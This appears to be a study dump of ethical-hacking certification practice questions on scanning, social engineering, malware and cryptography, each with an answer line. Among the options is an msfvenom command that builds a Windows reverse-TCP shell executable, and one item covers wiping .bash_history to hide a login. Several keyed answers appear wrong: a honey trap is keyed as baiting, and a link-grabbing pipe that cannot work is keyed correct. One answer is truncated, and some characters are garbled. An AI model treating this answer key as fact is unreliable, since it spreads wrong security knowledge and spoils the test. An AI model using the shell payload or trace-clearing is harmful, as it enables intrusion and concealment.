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By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password? A. .xsession-log B. .profile C. .bashrc D. .bash_history
.bash_history
In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in? A. 4.0-6.0 B. 3.9-6.9 C. 3.0-6.9 D. 4.0-6.9
4.0-6.9
What is the port to block first in case you are suspicious that an IoT device has been compromised? A. 22 B. 48101 C. 80 D. 443
48101
Which of the following Linux commands will resolve a domain name into IP address? A. >host-t a hackeddomain.com B. >host-t ns hackeddomain.com C. >host -t soa hackeddomain.com D. >host -t AXFR hackeddomain.com
>host-t a hackeddomain.com
Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario? A. DuckDuckGo B. AOL C. ARIN D. Baidu
ARIN
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task? A. UDP scan B. ARP ping scan C. ACK flag probe scan D. TCP Maimon scan
ARP ping scan
At what stage of the cyber kill chain theory model does data exfiltration occur? A. Weaponization B. Actions on objectives C. Command and control D. Installation
Actions on objectives
Which of the following is a component of a risk assessment? A. Administrative safeguards B. Physical security C. DMZ D. Logical interface
Administrative safeguards
The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been infected with? A. Trojan B. Spyware C. Virus D. Adware
Adware
Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario? A. SIM card attack B. Clickjacking C. SMS phishing attack D. Agent Smith attack
Agent Smith attack
You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? alert tcp any any -> 192.168.100.0/24 21 (msg: ג€ג€FTP on the network! A. A firewall IPTable B. FTP Server rule C. A Router IPTable D. An Intrusion Detection System
An Intrusion Detection System
What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application? A. AndroidManifest.xml B. classes.dex C. APK.info D. resources.asrc
AndroidManifest.xml
Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario? A. Baiting B. Piggybacking C. Diversion theft D. Honey trap
Baiting
Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario? A. Towelroot B. Knative C. zANTI D. Bluto
Bluto
Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations. Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA. In this context, what can you say? A. Bob can be right since DMZ does not make sense when combined with stateless firewalls B. Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one C. Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations D. Bob is partially right. DMZ does not make sense when a stateless firewall is available
Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations
Which type of security feature stops vehicles from crashing through the doors of a building? A. Bollards B. Receptionist C. Mantrap D. Turnstile
Bollards
Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore. Alice both encrypts the message and digitally signs it. Alice uses_______to encrypt the message, and Bryan uses__________to confirm the digital signature. A. Bryan's public key; Bryan's public key B. Bryan's public key; Alice's public key C. Alice's public key; Alice's public key D. Bryan's private key; Alice's public key
Bryan's public key; Alice's public key
John is investigating web-application firewall logs and observers that someone is attempting to inject the following: char buff[10]; buff[10] = a; What type of attack is this? A. SQL injection B. Buffer overflow C. CSRF D. XSS
Buffer overflow
What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne? A. White-hat hacking program B. Bug bounty program C. Ethical hacking program D. Vulnerability hunting program
Bug bounty program
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows? A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario? A. Cloud consumer B. Cloud broker C. Cloud auditor D. Cloud carrier
Cloud carrier
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario? A. Cloud cryptojacking B. Man-in-the-cloud (MITC) attack C. Cloud hopper attack D. Cloudborne attack
Cloud hopper attack
What is a Collision attack in cryptography? A. Collision attacks try to get the public key B. Collision attacks try to break the hash into three parts to get the plaintext value C. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key D. Collision attacks try to find two inputs producing the same hash
Collision attacks try to find two inputs producing the same hash
There are multiple cloud deployment options depending on how isolated a customer's resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called? A. Private B. Community C. Public D. Hybrid
Community
John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewall? A. DNSSEC zone walking B. DNS cache snooping C. DNS enumeration D. DNS tunneling method
DNS tunneling method
Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can be performed by exploiting the above vulnerability? A. Padding oracle attack B. DROWN attack C. DUHK attack D. Side-channel attack
DROWN attack
In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this? A. Delete the wireless network B. Lock all users C. Disable SSID broadcasting D. Remove all passwords
Disable SSID broadcasting
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario? A. Docker objects B. Docker daemon C. Docker client D. Docker registries
Docker daemon
Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it? A. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian's private key. B. Dorian is signing the message with Poly's private key, and Poly will verify that the message came from Dorian by using Dorian's public key. C. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key. D. Dorian is signing the message with Poly's public key, and Poly will verify that the message came from Dorian by using Dorian's public key.
Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key.
DHCP snooping is a great solution to prevent rogue DHCP servers on your network. Which security feature on switchers leverages the DHCP snooping database to help prevent man-in-the-middle attacks? A. Spanning tree B. Dynamic ARP Inspection (DAI) C. Port security D. Layer 2 Attack Prevention Protocol (LAPP)
Dynamic ARP Inspection (DAI)
CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this: From: [email protected] - To: [email protected] Subject: Test message - Date: 4/3/2017 14:37 - The employee of CompanyXYZ receives your email message. This proves that Company's email gateway doesn't prevent what? A. Email Masquerading B. Email Harvesting C. Email Phishing D. Email Spoofing
Email Spoofing
Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane's wireless network without a password. However, Jane has a long, complex password on her router. What attack has likely occurred? A. Wardriving B. Wireless sniffing C. Evil twin D. Piggybacking
Evil twin
Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above information? A. FCC ID search B. Google image search C. search.com D. EarthExplorer
FCC ID search
Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella? A. FTPS B. FTP C. HTTPS D. IP
FTPS
Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities. What will you call these issues? A. False positives B. True negatives C. True positives D. False negatives
False positives
Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting? A. File-less malware B. Zero-day malware C. Phishing malware D. Logic bomb malware
File-less malware
An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure? A. Robotium B. BalenaCloud C. Flowmon D. IntentFuzzer
Flowmon
To determine if a software program properly handles a wide range of invalid input, a form of automated testing can be used to randomly generate invalid input in an attempt to crash the program. What term is commonly used when referring to this type of testing? A. Randomizing B. Bounding C. Mutating D. Fuzzing
Fuzzing
Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology? A. Scanning B. Gaining access C. Maintaining access D. Reconnaissance
Gaining access
To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed here? A. Subnet scanning technique B. Permutation scanning technique C. Hit-list scanning technique D. Topological scanning technique
Hit-list scanning technique
Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker? A. Botnet B. Intrusion detection system C. Firewall D. Honeypot
Honeypot
Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane promptly replied positively. Ralph entered Jane's company using this opportunity and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the type of attack technique Ralph used on Jane? A. Impersonation B. Dumpster diving C. Shoulder surfing D. Eavesdropping
Impersonation
An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario? A. Service-based solutions B. Product-based solutions C. Tree-based assessment D. Inference-based assessment
Inference-based assessment
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario? A. Factiva B. ZoomInfo C. Netcraft D. Infoga
Infoga
Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing? A. Initial intrusion B. Persistence C. Cleanup D. Preparation
Initial intrusion
If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning? A. It is a non-stateful firewall. B. There is no firewall in place. C. It is a stateful firewall. D. This event does not tell you anything about the firewall.
It is a stateful firewall
John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information from the LDAP service? A. ike-scan B. Zabasearch C. JXplorer D. EarthExplorer
JXplorer
To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core components of the operating system. What is this type of rootkit an example of? A. Hypervisor rootkit B. Kernel rootkit C. Hardware rootkit D. Firmware rootkit
Kernel rootkit
While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, Learn more about your friends!, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened? A. Matt inadvertently provided the answers to his security questions when responding to the post. B. Matt inadvertently provided his password when responding to the post. C. Matt's computer was infected with a keylogger. D. Matt's bank-account login information was brute forced.
Matt inadvertently provided the answers to his security questions when responding to the post.
Sam is working as a system administrator in an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization's vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario? A. Critical B. Medium C. High D. Low
Medium
Which of the following describes the characteristics of a Boot Sector Virus? A. Modifies directory table entries so that directory entries point to the virus code instead of the actual program. B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR. C. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. D. Overwrites the original MBR and only executes the new virus code.
Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.
Which of the following program infects the system boot sector and the executable files at the same time? A. Polymorphic virus B. Stealth virus C. Multipartite Virus D. Macro virus
Multipartite Virus
Which regulation defines security and privacy controls for Federal information systems and organizations? A. HIPAA B. EU Safe Harbor C. PCI-DSS D. NIST-800-53
NIST-800-53
Kevin, a professional hacker, wants to penetrate CyberTech Inc's network. He employed a technique, using which he encoded packets with Unicode characters. The company's IDS cannot recognize the packets, but the target web server can decode them. What is the technique used by Kevin to evade the IDS system? A. Session splicing B. Urgency flag C. Obfuscating D. Desynchronization
Obfuscating
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker? A. In-band SQLi B. Union-based SQLi C. Out-of-band SQLi D. Time-based blind SQLi
Out-of-band SQLi
Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables? A. Account lockout B. Password hashing C. Password key hashing D. Password salting
Password salting
A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which of the following security processes? A. Secure development lifecycle B. Security awareness training C. Vendor risk management D. Patch management
Patch management
An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim's data. What type of attack is this? A. Vishing B. Phishing C. DDoS D. Spoofing
Phishing
Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which of the following ports should Robin run the NSTX tool? A. Port 50 B. Port 23 C. Port 53 D. Port 80
Port 53
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE's Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520. What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy? A. Public B. Private C. Shared D. Root
Private
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the networkגTM€s external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive? A. Protocol analyzer B. Network sniffer C. Intrusion Prevention System (IPS) D. Vulnerability scanner
Protocol analyzer
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario? A. Diversion theft B. Quid pro quo C. Elicitation D. Phishing
Quid pro quo
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario? A. RESTful API B. JSON-RPC C. SOAP API D. REST API
RESTful API
Which file is a rich target to discover the structure of a website during web-server footprinting? A. domain.txt B. Robots.txt C. Document root D. index.html
Robots.txt
The establishment of a TCP connection involves a negotiation called three-way handshake. What type of message does the client send to the server in order to begin this negotiation? A. ACK B. SYN C. RST D. SYN-ACK
SYN
Heather's company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which of the following is this type of solution? A. Iaas B. Saas C. PaaS D. Caas
Saas
Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario? A. Forbidden attack B. CRIME attack C. Session donation attack D. Session fixation attack
Session donation attack
A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here? A. Desynchronization B. Slowloris attack C. Session splicing D. Phlashing
Slowloris attack
Which type of virus can change its own code and then cipher itself multiple times as it replicates? A. Stealth virus B. Tunneling virus C. Cavity virus D. Encryption virus
Stealth virus
Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports? A. Xmas scan B. IDLE/IPID header scan C. TCP Maimon scan D. ACK flag probe scan
TCP Maimon scan
Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob's connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the above scenario? A. TCP/IP hijacking B. Blind hijacking C. UDP hijacking D. Forbidden attack
TCP/IP hijacking
The company ABC recently contracts a new accountant. The accountant will be working with the financial statements. Those financial statements need to be approved by the CFO and then they will be sent to the accountant but the CFO is worried because he wants to be sure that the information sent to the accountant was not modified once he approved it. Which of the following options can be useful to ensure the integrity of the data? A. The CFO can use a hash algorithm in the document once he approved the financial statements B The CFO can use an excel file with a password C. The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure is the same document D. The document can be sent to the accountant using an exclusive USB for that document
The CFO can use a hash algorithm in the document once he approved the financial statements
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization? A. The attacker queries a nameserver using the DNS resolver. B. The attacker uses TCP to poison the DNS resolver. C. The attacker makes a request to the DNS resolver. D. The attacker forges a reply from the DNS resolver.
The attacker queries a nameserver using the DNS resolver.
Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture is Abel currently working in? A. Tier-1: Developer machines B. Tier-2: Testing and accreditation systems C. Tier-3: Registries D. Tier-4: Orchestrators
Tier-2: Testing and accreditation systems
Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for? A. Out of band and boolean-based B. Union-based and error-based C. Time-based and union-based D. Time-based and boolean-based
Time-based and boolean-based
Why should the security analyst disable/remove unnecessary ISAPI filters? A. To defend against social engineering attacks B. To defend against webserver attacks C. To defend against jailbreaking D. To defend against wireless attacks
To defend against webserver attacks
What is the purpose of a demilitarized zone on a network? A. To scan all traffic coming through the DMZ to the internal network B. To only provide direct access to the nodes within the DMZ and protect the network behind it C. To provide a place to put the honeypot D. To contain the network devices you wish to protect
To only provide direct access to the nodes within the DMZ and protect the network behind it
In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm? A. IDEA B. Triple Data Encryption Standard C. AES D. MD5 encryption algorithm
Triple Data Encryption Standard
This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm? A. HMAC encryption algorithm B. Twofish encryption algorithm C. IDEA D. Blowfish encryption algorithm
Twofish encryption algorithm
A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer. What tests would you perform to determine whether his computer is infected? A. Upload the file to VirusTotal. B. You do not check; rather, you immediately restore a previous snapshot of the operating system. C. Use ExifTool and check for malicious content. D. Use netstat and check for outgoing connections to strange IP addresses or domains.
Upload the file to VirusTotal
John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption? A. Use his own private key to encrypt the message. B. Use his own public key to encrypt the message. C. Use Marie's private key to encrypt the message. D. Use Marie's public key to encrypt the message.
Use Marie's public key to encrypt the message.
Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer? A. Use the built-in Windows Update tool B. Use a scan tool like Nessus C. Check MITRE.org for the latest list of CVE findings D. Create a disk image of a clean Windows installation
Use a scan tool like Nessus
Bob, a network administrator at BigUniversity, realized that some students are connecting their notebooks in the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students. He identified this when the IDS alerted for malware activities in the network. What should Bob do to avoid this problem? A. Disable unused ports in the switches B. Separate students in a different VLAN C. Use the 802.1x protocol D. Ask students to use the wireless network
Use the 802.1x protocol
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario? A. Website footprinting B. Dark web footprinting C. VPN footprinting D. VoIP footprinting
VPN footprinting
Which of the following commands checks for valid users on an SMTP server? A. RCPT B. CHK C. VRFY D. EXPN
VRFY
Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as `'or `˜1'=`˜1'` in any basic injection statement such as `or 1=1.`Identify the evasion technique used by Daniel in the above scenario. A. Char encoding B. IP fragmentation C. Variation D. Null byte
Variation
You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at? A. Reconnaissance B. Weaponization C. Command and control D. Exploitation
Weaponization
Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario? A. Webroot B. Web-Stat C. WebSite-Watcher D. WAFW00F
Web-Stat
Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario? A. Session hijacking B. Website mirroring C. Website defacement D. Web cache poisoning
Website mirroring
Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization's network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard? A. VoIP footprinting B. Email footprinting C. Whois footprinting D. VPN footprinting
Whois footprinting
Shellshock allowed an unauthorized user to gain access to a server. It affected many Internet-facing services, which OS did it not directly affect? A. Linux B. Unix C. OS X D. Windows
Windows
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario? A. Wireless network assessment B. Application assessment C. Host-based assessment D Distributed assessment
Wireless network assessment
A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine. Which of the following advanced operators would allow the pen tester to restrict the search to the organization's web domain? A. [allinurl:] B. [location:] C. [site:] D. [link:]
[site:]
Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, Clark gains access to Steven's iPhone through the infected computer and is able to monitor and read all of Steven's activity on the iPhone, even after the device is out of the communication zone. Which of the following attacks is performed by Clark in the above scenario? A. Man-in-the-disk attack B. iOS jailbreaking C. iOS trustjacking D. Exploiting SS7 vulnerability
iOS trustjacking
Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization's OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information? A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP > B. nmap -Pn -sU -p 44818 --script enip-info < Target IP > C. nmap -Pn -sT -p 46824 < Target IP > D. nmap -Pn -sT -p 102 --script s7-info < Target IP >
nmap -Pn -sU -p 44818 --script enip-info < Target IP >
Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan? A. nmap -sn -PO < target IP address > B. nmap -sn -PS < target IP address > C. nmap -sn -PA < target IP address > D. nmap -sn -PP < target IP address >
nmap -sn -PS < target IP ad
A company's policy requires employees to perform file transfers using protocols which encrypt traffic. You suspect some employees are still performing file transfers using unencrypted protocols because the employees do not like changes. You have positioned a network sniffer to capture traffic from the laptops used by employees in the data ingest department. Using Wireshark to examine the captured traffic, which command can be used as a display filter to find unencrypted file transfers? A. tcp.port = = 21 B. tcp.port = 23 C. tcp.port = = 21 | | tcp.port = =22 D. tcp.port ! = 21
tcp.port = = 21
Which of the following is a command line packet analyzer similar to GUI-based Wireshark? A. nessus B. tcpdump C. ethereal D. jack the ripper
tcpdump
Which of the following tools can be used for passive OS fingerprinting? A. nmap B. tcpdump C. tracert D. ping
tcpdump
You start performing a penetration test against a specific website and have decided to start from grabbing all the links from the main page. What is the best Linux pipe to achieve your milestone? A . dirb https://site.com | grep "site" B . curl -s https://sile.com | grep ''< a href-'http" | grep "Site-com- | cut -d "V" -f 2 C . wget | grep "< a href=\*http" | grep "site.com" D . wgethttps://site.com | cut-d"http-
wget | grep "< a href=\*http" | grep "site.com"